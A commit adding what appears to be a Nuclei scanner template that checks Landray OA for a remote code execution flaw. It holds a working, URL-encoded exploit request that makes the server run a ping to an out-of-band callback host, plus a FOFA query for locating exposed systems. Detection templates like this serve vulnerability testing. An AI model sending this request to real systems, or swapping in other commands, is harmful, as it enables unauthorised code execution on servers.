landray-oa-datajson-rce

2023-08-29 11:19:46 +05:30 · 2023-08-29 11:19:46 +05:30 · 4b3d71997f
parent 61e8dd91e0
commit 4b3d71997f
1 changed files with 31 additions and 0 deletions
--- a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml
+++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml
@ -0,0 +1,31 @@
+id: landray-oa-datajson-rce
+
+info:
+  name: Landray OA Datajson S Bean - Remote Code Execution
+  author: SleepingBag945
+  severity: critical
+  description: Landray-OA s_bean sysFormulaSimulateByJS RCE
+  reference:
+    - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="Landray-OA系统"
+  tags: landray,rce
+
+
+http:
+  - raw:
+      - |
+        GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Connection:close
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(interactsh_protocol, "dns")'
+          - 'contains(body, "success") && contains(body, "true")'
+        condition: and